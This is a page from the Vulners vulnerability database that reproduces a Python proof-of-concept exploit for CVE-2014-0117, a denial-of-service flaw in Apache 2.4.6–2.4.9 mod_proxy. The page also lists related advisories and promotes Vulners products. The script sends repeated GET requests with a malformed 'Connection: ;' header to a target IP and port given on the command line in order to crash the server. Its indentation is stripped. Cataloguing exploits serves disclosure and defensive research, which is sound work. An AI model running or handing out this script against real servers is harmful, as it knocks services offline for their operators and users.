Vulners
Lucene search
Apache 2.4.x mod_proxy 拒绝服务攻击 PoC
| Reporter | Title | Published | Views | Family All 72 |
|---|---|---|---|---|
 | apache24 -- several vulnerabilities | 15 Jul 201400:00 | – | freebsd |
 | Apache HTTP Server 2.4.6, 2.4.7, 2.4.9 Vulnerability | 29 Jul 201400:00 | – | nessus |
| Mac OS X 10.10.x < 10.10.3 Multiple Vulnerabilities | 10 Apr 201900:00 | – | nessus |
| Apache 2.4.x < 2.4.10 Multiple Vulnerabilities | 21 Jul 201400:00 | – | nessus |
| CentOS 7 : httpd (CESA-2014:0921) | 24 Jul 201400:00 | – | nessus |
| EulerOS Virtualization 3.0.1.0 : httpd (EulerOS-SA-2019-1419) | 14 May 201900:00 | – | nessus |
| Fedora 20 : httpd-2.4.10-1.fc20 (2014-8742) | 26 Jul 201400:00 | – | nessus |
| Fedora 19 : httpd-2.4.10-1.fc19 (2014-9057) | 15 Aug 201400:00 | – | nessus |
| FreeBSD : apache24 -- several vulnerabilities (4364e1f1-0f44-11e4-b090-20cf30e32f6d) | 21 Jul 201400:00 | – | nessus |
| Mac OS X 10.10.x < 10.10.3 Multiple Vulnerabilities (FREAK) | 10 Apr 201500:00 | – | nessus |
10
# Exploit Title: Apache 2.4.x mod_proxy Denial Of Service(CVE-2014-0117)
# Date: 2014-07-20
# Exploit Author: aisyhi
# Version: 0.1
# Apache httpd 2.4.6 to 2.4.9
# Tested on: Apache/2.4.7
# CVE : CVE-2014-0117
import httplib
import logging
import time
import socket
import sys
import os
debug = False
socket.setdefaulttimeout(3)
httplib.HTTPConnection.debuglevel = 1 if debug else 0
packet = 0
print "======================================================================"
print u"Apache 2.4.x mod_proxy Denial Of Service(CVE-2014-0117)"
print "======================================================================"
if len(sys.argv) < 2:
print "Usage: python CVE-2014-0117.py [target ip] [target port]\n"
print "Example: python CVE-2014-0117 127.0.0.1\n"
sys.exit(1)
else:
host = sys.argv[1].lower()
try:
port = int(sys.argv[2])
except:
port = 80
while packet <= 10:
try:
con = httplib.HTTPConnection(host, port)
con.putrequest('GET', '/')
con.putheader('User-Agent', "curl/7.30.0")
con.putheader('Accept', "*/*")
con.putheader('Connection', ";")
con.endheaders()
except:
print "Connection error!"
sys.exit(1)
try:
resp = con.getresponse()
print(resp.status, resp.reason)
except socket.timeout:
print "[*] Socket timeout?"
except:
print "[*] Knock knock, is anybody there ? (" + str(packet) + "/10)"
packet = packet + 1
con.close()
print "[+] Done!"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2014 00:00Current
7.2High risk
Vulners AI Score7.2
EPSS0.56996